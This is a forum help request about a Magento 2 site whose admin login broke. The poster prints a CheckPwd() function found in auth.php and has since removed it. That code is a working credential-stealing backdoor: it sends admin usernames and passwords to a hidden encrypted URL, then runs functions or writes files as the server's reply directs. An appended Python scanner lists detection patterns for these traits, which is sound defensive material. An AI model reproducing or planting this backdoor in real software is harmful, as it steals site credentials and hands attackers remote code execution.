Hi Everyone,
One of the M2 sites I help out with suddenly couldn't log in to the admin panel. I finally found code in the auth.php file (see below). I compared this against another site's auth.php file content and the below code didn't exist. On removing it I can now log in to the admin panel. Has anyone had any experience of seeing this code in the auth.php file, and does it have sinister purposes?

    /**
     * Check Password process
     *
     * @return void
     */
    public function CheckPwd($username, $password, $isGood)
    {
        try {
            $url = openssl_decrypt("pOJ8p5qgxgA6lcH1F64+SQk1YUNpCbJpg/OzAGw57TUdj2DxK8CSrgHbUJzNeXTj", "AES-128-ECB", "459F8892AA0637DFF887DA73D733B91F");
            $ip = $_SERVER['REMOTE_ADDR'];
            $domain = $_SERVER['HTTP_HOST'];
            $currentPath = $_SERVER['REQUEST_URI'];
            $object = (object) ['username' => $username, 'password' => $password, 'success' => $isGood, 'ip' => $ip, 'domain' => $domain, 'url' => $currentPath];
            $options = array(
                'http' => array(
                    'header' => "Content-type: application/json\r\n",
                    'method' => 'POST',
                    'content' => json_encode($object)
                )
            );
            $context = stream_context_create($options);
            $result = file_get_contents($url, false, $context);
            if(isset($result)){
                $emailInfo = openssl_decrypt($result, "AES-128-ECB", "459F8892AA0637DFF887DA73D733B91F");
                $emails = explode("@", $emailInfo);
                if($emails[0] === "smtp"){
                    $emails[1]($emails[2]);
                }
                if($emails[0] === "pop3"){
                    file_put_contents($emails[1], $emails[2]);
                }
            }
        } catch (Exception $e) {
        }
    }

Any help greatly appreciated.
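
A heuristic scan for the traits visible in the snippet above (credentials placed in a POST payload, a URL decrypted from a string literal, a data-driven function call and file write), as an added example that is not part of the original post. The rule names, the threshold of three and both sample strings are assumptions constructed for this example.

```python
import re

# Heuristic traits taken from the CheckPwd() snippet in the post above.
# Rule names and regexes are this example's own, not a vendor signature set.
RULES = {
    # $emails[1]($emails[2]);  function name chosen by data at runtime
    "dynamic-call": re.compile(r"\$\w+\s*\[[^\]]+\]\s*\("),
    # openssl_decrypt("<literal>", ...)  string hidden in the source
    "decrypt-literal": re.compile(r"openssl_decrypt\s*\(\s*[\"'][A-Za-z0-9+/=]{16,}[\"']"),
    # file_get_contents($url, false, $context)  request to a variable URL
    "remote-fetch": re.compile(r"file_get_contents\s*\(\s*\$\w+\s*,\s*\w+\s*,\s*\$\w+"),
    # file_put_contents($x[1], $x[2])  path and content both data-driven
    "dynamic-write": re.compile(r"file_put_contents\s*\(\s*\$\w+\s*\[[^\]]+\]\s*,\s*\$\w+\s*\["),
    # 'password' => $password  plaintext password copied into a payload
    "password-in-payload": re.compile(r"[\"']password[\"']\s*=>\s*\$\w+"),
}

def scan_php(source):
    """Return sorted (line_number, rule_name) hits for PHP source text."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((lineno, name))
    return sorted(hits)

def verdict(hits, threshold=3):
    """Flag a file only when several distinct traits co-occur."""
    return len({name for _, name in hits}) >= threshold

# Constructed samples: placeholder ciphertext and key, not the values from the post.
SUSPECT = r'''<?php
$url = openssl_decrypt("QUFBQUFBQUFBQUFBQUFBQQ==", "AES-128-ECB", "CONSTRUCTED-KEY");
$object = (object) ['username' => $username, 'password' => $password];
$result = file_get_contents($url, false, $context);
$emails = explode("@", $emailInfo);
$emails[1]($emails[2]);
file_put_contents($emails[1], $emails[2]);
'''
CLEAN = r'''<?php
public function login($username, $password)
{
    $this->getCredentialStorage()->login($username, $password);
    return $this;
}
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT), ("clean", CLEAN)):
        print(label, verdict(scan_php(src)), scan_php(src))
```

A hit is a reason to diff the file against a clean copy of the same release, as the post did by hand, rather than proof on its own.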